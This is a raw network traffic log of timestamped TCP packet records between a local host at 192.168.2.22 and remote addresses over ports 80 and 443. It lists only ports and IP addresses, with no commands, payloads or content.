Oct 25, 2024 19:51:14.973001957 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973016977 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973027945 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973064899 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.973087072 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.973213911 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973226070 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973237038 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.973254919 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.973315001 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.044126987 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044167995 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044178963 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044203043 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044212103 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044215918 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.044249058 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.044604063 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.044648886 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.113564968 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.113583088 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.113625050 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.113624096 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.113657951 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.113709927 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.113742113 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.113785982 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.114198923 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.114250898 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.151753902 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.184808969 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.184884071 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.184894085 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.184914112 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.185098886 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.185106993 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.185250044 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.185291052 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.185353041 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.185388088 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.256278038 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.256690979 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.256866932 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.638458014 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.638504982 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.638521910 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.638540030 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.638547897 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.638581038 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:15.639416933 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:15.639471054 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:16.014735937 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:16.014758110 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:16.014799118 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:16.014846087 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.218482018 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.218525887 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.218621016 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.361711025 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361745119 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361823082 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361862898 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361861944 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.361877918 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361888885 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.361892939 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.361912966 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.361932993 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.362536907 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.362559080 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.362587929 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.362603903 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.431823969 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.431905985 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.431929111 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.431943893 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.431977987 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.431988955 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.432013035 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.432015896 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:17.432034016 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:17.432060003 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.420501947 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.420537949 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.420553923 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.420566082 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.420584917 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.420610905 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.420610905 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.491185904 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.491199970 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.491209984 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.491261959 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.491261959 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.491369963 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.491417885 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.491707087 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.491746902 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.566427946 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.566442966 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.566463947 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.566515923 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.566524029 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.566529036 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.566553116 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:18.639018059 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.639033079 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:18.639105082 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.015439034 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.015458107 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.015583992 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157424927 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157474995 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157511950 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157547951 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157686949 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157706976 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157742977 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157814026 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157869101 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157877922 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157912016 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157922983 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157947063 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.157958984 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.157985926 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.158617020 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.158705950 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.228461981 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.228607893 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.228610992 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.228660107 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.280162096 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.280239105 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.367929935 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.367947102 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.367954016 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368097067 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.368165970 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368177891 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368189096 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368227005 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.368284941 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368324995 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.368324995 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.368940115 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.368987083 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.369303942 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.369348049 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.439186096 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.439275980 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.439306974 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.439353943 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.439368010 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.439383984 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.439409971 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.439431906 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577441931 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577471018 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577482939 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577497005 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577663898 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577665091 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577728033 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577769041 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577847004 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577887058 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577944994 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577958107 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.577977896 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.577996016 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.578392982 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.578460932 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.578460932 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.578495026 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.648137093 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.648205996 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.648241043 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.648263931 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.648278952 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.648292065 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.648292065 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.648323059 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:19.648534060 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:19.648588896 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.027476072 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:20.027501106 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:20.027673960 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.313369036 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:20.313477039 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:20.313508987 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.313554049 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.313642025 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:20.313692093 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.366210938 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:20.371526003 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:26.442555904 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:26.442610025 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:26.442667007 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:26.445476055 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:26.445507050 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.333944082 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.334024906 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.334733963 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.334789991 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.340953112 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.340969086 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.341242075 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.404194117 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.447320938 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.770020962 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.893198013 CEST	443	49173	142.250.186.46	192.168.2.22
Oct 25, 2024 19:51:27.893263102 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.897490025 CEST	49173	443	192.168.2.22	142.250.186.46
Oct 25, 2024 19:51:27.917397976 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:27.917450905 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:27.917505026 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:27.917886019 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:27.917900085 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:28.778688908 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:28.779011965 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:28.783452988 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:28.783463955 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:28.783845901 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:28.785972118 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:28.831326962 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.198097944 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.198224068 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.206654072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.206733942 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.315035105 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.315110922 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.315124035 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.320396900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.320421934 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.320452929 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.320465088 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.320508957 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.324857950 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.333559990 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.333628893 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.333641052 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.342734098 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.342756033 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.342787027 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.342797041 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.342833042 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.351793051 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.351845980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.351892948 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.351907015 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.360807896 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.360868931 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.360883951 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.369702101 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.369759083 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.369776011 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.378361940 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.378511906 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.378523111 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432040930 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432066917 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432157993 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.432171106 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432399035 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432499886 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432538033 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.432545900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.432593107 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.433013916 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.437380075 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.437447071 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.437457085 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.442763090 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.442797899 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.442852020 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.442862034 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.442924023 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.445755005 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.451927900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.451960087 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.451994896 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.452006102 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.452058077 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.457824945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.457865000 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.457911968 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.457921028 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.463468075 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.463525057 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.463536978 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.469409943 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.469470978 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.469484091 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.475061893 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.475111008 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.475121021 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.480679989 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.480725050 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.480734110 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.486519098 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.486669064 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.486680031 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.494234085 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.494283915 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.494294882 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.498255014 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.498307943 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.498317957 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.503788948 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.503839016 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.503849983 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.509596109 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.509860039 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.509870052 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.515367031 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.515424013 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.515434980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.521011114 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.521068096 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.521079063 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.548835039 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.548882008 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.548908949 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.548952103 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.548969030 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.549001932 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.549350023 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.549427032 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.549433947 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.549666882 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.549717903 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.549724102 CEST	443	49174	142.250.186.161	192.168.2.22
